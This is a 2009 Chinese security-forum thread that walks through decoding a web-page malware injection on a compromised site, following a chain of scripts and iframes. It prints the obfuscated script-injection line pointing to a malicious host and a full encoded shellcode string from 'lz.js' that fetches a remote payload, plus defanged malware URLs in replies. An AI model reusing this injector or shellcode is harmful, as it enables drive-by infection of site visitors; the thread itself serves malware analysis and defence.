解密中容易忽略网马类型(二) bbs.ikaka.com

networkedition - 2009-6-9 9:29:00

今天我们再来讲一个在初次学习网马解密过程中，新手容易忽略网马类型。这个实例也是在瑞星每日安全播报中一个被挂马网站（http://3g.woku.com），觉得这个例子很典型，今天就来针对这个实例，来给大家讲解一下。

我们知道一般网页挂马无外乎，在网站首页源代码的头部、中间、尾部，还有一些隐蔽的直接给你挂到二级页面等等，今天我们讲解的这个实例，所挂恶意网址链接在首页的尾部，对于刚学习网页挂马新手，往往有可能会忽略。

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

networkedition - 2009-6-9 9:47:00

上图为我们使用freshow的check获取网站源代码后，通过filter过滤出的3个script，按照常规解密方法，我们会依次查看这三个script，但是我们发现这三个script并未见有异常。那么我们会认为这个网站是正常？通常我们在网马解密过程中，在获取网站源代码后，最好首先要做的就是仔细查看一下网站源代码，从顶部、中间、尾部等三方面来依次查看，因为我们知道工具不是万能的，它也有可能会忽略掉一些关键链接，而往往被忽略的链接，恰恰是我们最需要检查的链接地址。以上也是一些网马解密中的小经验吧，共享给大家。

结合我们今天讲解的实例，在通过检查三个script未见异常，那么我们来看一下获取到网站源代码，在源代码的尾部有两处异常，详见下列截图：

networkedition - 2009-6-9 10:10:00

接下来我们来一下上图红色线标出的代码，简单分析一下。

[复制到剪贴板]

CODE:

document.write(unescape("%3Cscript%20src%3Dhttp%3A//ww2.niupan.com/html/youxi/html/youxi/dianzijingji/ads.jpg%3E%3C/script%3E"));

unescape后面的代码看起来很乱，我们将这段代码复制粘贴至freshow的上操作区，通过esc的decode处理一下这段代码。

[复制到剪贴板]

CODE:

document.write(unescape("<script src=http://ww2.niupan.com/html/youxi/html/youxi/dianzijingji/ads.jpg></script>"));

经过处理的代码阅读起来简单明了，简单分析一下这也是个script，链接到一个ads.jpg，那么我们来看一下这个jpg是否有问题呢？

networkedition - 2009-6-9 10:19:00

为了能更好的区分父级和子级的链接对应关系，我们最好将获取到得ad.jpg链接，粘贴至obj区，将它插入到最初我们分析网站链接地址下面，这样就很清楚了，ad.jpg链接是在网站源代码中，具体见上述截图。

接下来我们通过check获取ad.jpg源代码，再通过filter我们过滤出一个iframe。

networkedition - 2009-6-9 10:23:00

我们再来看一下adss.htm这个ifame源代码内容，详见下面截图：

链接到一个b11.htm的iframe

networkedition - 2009-6-9 10:31:00

再来看一下b11.htm源代码内容，注：别忘用filter将b11.htm过滤到数据收集区，详见下列截图：

有个new.htm的frame，下图后new.htm源代码内容：

networkedition - 2009-6-9 10:39:00

接下来将new.htm的源文件内容过滤一下，详见下列截图：

过滤出三个script和4个iframe，我们来看其中一个zhin.js是否有马

networkedition - 2009-6-9 10:46:00

从zhin.js中我们过滤出lz.htm，再从lz.htm中我们又过滤出lz.js，接下来看一下lz.js源代码，详见下列截图：

[复制到剪贴板]

CODE:

var sdzl=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%u7074%u2f3a%u632f%u6a30%u2e6d%u6f63%u3a6d%u3333%u2f33%u656e%u7777%u6c2f%u7a7a%u632e%u7373%u0000");

networkedition - 2009-6-9 10:55:00

来简单分析一下lz.js，实际上是个shellcode，有很多"+"来连接，可理解为字符串的拼接。可以通过freshow的replace功能去除不需要的代码。小技巧我们直接处理下面代码即可：

[复制到剪贴板]

CODE:

"%u74"+"6"+"8%u7074%u2f3a%u632f%u6a30%u2e6d%u6f63%u3a6d%u3333%u2f33%u656e%u7777%u6c2f%u7a7a%u632e%u7373%u0000

处理好的代码如下：

[复制到剪贴板]

CODE:

%u7468%u7074%u2f3a%u632f%u6a30%u2e6d%u6f63%u3a6d%u3333%u2f33%u656e%u7777%u6c2f%u7a7a%u632e%u7373%u0000

两次esc后解出网马地址，详见下列截图：

networkedition - 2009-6-9 11:07:00

好了，后面的几个链接地址就留给大家去解密吧，在这里就不一一进行讲解了。我们来总结一下，通过对上述被挂马网站的分析，我们看到在实际网马解密中，对于在获取到网站源代码后，一定要养成一个良好的习惯，就是先简单查看一下源文件内容这包括顶部、中间、尾部，这些也通常是被网页挂马所利用到得地方。不要过分的依赖解密工具，工具并不是万能的。通过本次讲解，也是想跟大家分享一下这方面的解密经验，希望对大家在网马解密中有所帮助。:kaka12:

艾玛 - 2009-6-9 12:08:00

嗯，这里面有不少！

hxxp://c0DSm.com:333/neww/adr.css

不知道怎么失效的？域名填错了？:kaka6:

艾玛 - 2009-6-9 12:12:00

:kaka6: 经测试hxxp://c0jm.com:333/neww/adr.csse 有效，还真是挂马的人傻搓了！

轩辕小聪 - 2009-6-9 20:57:00

其实挂在网页尾部已经很常见了。之所以大家会看不到，只是解密步骤的问题。
得到一个源文件内容，要先看看它有没有包括加密内容，如果有，应该先解密出来，全部解密出来之后，再使用查找iframe和js的功能。

於陵闲云 - 2009-7-2 21:47:00

这个是很容易被遗漏的:kaka12:

瑞星卡卡安全论坛